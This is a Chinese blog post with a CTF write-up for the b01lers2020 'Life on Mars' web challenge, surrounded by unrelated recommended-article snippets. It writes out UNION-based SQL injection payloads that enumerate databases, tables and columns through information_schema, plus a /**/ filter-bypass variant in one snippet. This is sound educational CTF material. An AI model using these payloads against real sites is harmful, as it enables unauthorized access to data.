[b01lers2020]Life on Mars

最新推荐文章于 2023-12-07 21:16:33 发布
最新推荐文章于 2023-12-07 21:16:33 发布
阅读量245 收藏 1
点赞数
文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124336527
版权

点进去可以看见是类似于日记一样的

起初我以为是那种唬人的,flag在每个主题里面,NO

扫描目录,无东西

看源码,无hint

通过抓包跳转发现有东西

有参数!

把search改为1会回显1,改为2还是1,于是在想利用之前那个地点来试试可不可以联合注入

 发现成功回显了1,2,看来这就是一个注入题目了,试试database()

数据库aliens

 union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

表名amazonis_planitia,arabia_terra,chryse_planitia,hellas_basin,hesperia_planum,noachis_terra,olympus_mons,tharsis_rise,utopia_basin

union select 1,group_concat(column_name) from information_schema.columns where table_name='xxxx'各个表都查一下

字段都是id,name,description

/query?search=amazonis_planitia+union+select+1,group_concat(id,0x3a,name,0x3a,description)+from+aliens.amazonis_planitia

结果这些字段一个都没有,说明不是这个数据库。。。。。。

/query?search=amazonis_planitia+union+select+1,group_concat(schema_name)+from+information_schema.schemata

照着之前办法在alien_code数据库里面找即可 

学到了可以这么查所有的数据库信息,之前都没碰到过……

MySQL注入涉及的information_schema库讲解_Regenwald的博客-CSDN博客

-栀蓝-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。 您将找到以下目录: rev:Rev的挑战 pwn:Pwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 分布式文件:我们在CTF期间分发供下载的tgz文件 以及比赛的比分牌。 所有挑战都应具有挑战文件,源代码以及编写和/或求解器。 如果没有,请创建一个github问题,我们将修复该问题。 如果您需要更多帮助,请随时与b01lers-ctf discord上的DM创建者联系。 没有承诺,他们会回应,我们很忙。
FZHei-B01.zip
05-13
FZHei-B01字体,windows下 latex 应用字体,利用管理员模式安装即可,成功后可消除相关latex缺少字体报错。
[b01lers2020]Life on Mars 1
m0_73728268的博客
04-02 129
sqlmap
[b01lers2020]Life on Mars1
mlws1900的博客
08-21 214
search=这个参数一直在发生改变。可以发现它返回了json格式的数据,猜测是sql注入。放进hackbar进行操作。后面就是sql注入一梭子。orderby进行判断。看到回显点,进行查询。
英文高频词
热门推荐
自然语言处理及大数据
09-08 36万+
('rods', 100) ('carbohydrates', 100) ('stresses', 100) ('premiered', 100) ('cyrus', 100) ('drastically', 100) ('eukaryotic', 100) ('witchcraft', 100) ('accompaniment', 100) ('conventionally',
2020-纵横杯-Writeup.pdf
03-15
2020年纵横杯CTF比赛Writeup 高清PDF版
电子水墨屏ALFG0290B01
11-30
电子水墨屏ALFG0290B01的规格书,里面详细介绍了屏的使用和尺寸
otp_win64_R15B01.rar
08-13
otp_win64_R15B01
otp_win32_R15B01.rar
08-13
otp_win32_R15B01
matlab randn(seed),matlab中用rng替换rand('seed',sd)、randn('seed',sd)和rand('state',sd)的通俗解释...
weixin_42504649的博客
03-19 2060
1.rand('seed',sd)、randn('seed',sd)和rand('state',sd)中各参数的含义我们知道,rand和randn都是用来产生伪随机数的,但是产生伪随机数的generator(发生器)有多种,而seed、state、twister等就是用来指定不同类型的伪随机数发生器的,其中seed 指“v4 generator”,state指“v5 generator”,twi...
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2923
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
[b01lers2020]Life on Mars 一个接口的sql schema.schemate表
最新发布
m0_64180167的博客
12-07 472
太多了 不切实际一个一个查 看看有没有其他数据库。然后如果正确就会返回值 否则 返回1。发现传递参数 直接尝试sql。发现回显 直接开始注入。
BUUCTF:[b01lers2020]Life on Mars
末初的CSDN博客
08-01 2027
题目地址:https://buuoj.cn/challenges#[b01lers2020]Life%20on%20Mars 一个关于火星生命的科普站,目录扫描啥都没发现,用burp抓两个包分析一下,发现几个可疑传参 /query?search=如果地名输入正确,发现返回如下 order by判断字段,2字段时回显正确 union联合查询:/query?search=amazonis_planitia union select 111,222 回显点如图所示: 查库:/query?search=a
jetbot b01
09-09
JetBot B01是一款智能小车套件,可以通过驱动车轮马达和镜头舵机的方式使机器人运动起来。它可以通过在某宝上购买XX智能的JetBot散套件来组装。这个套件可以用于学习机器人控制和视觉感知等方面。如果你想了解更多...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值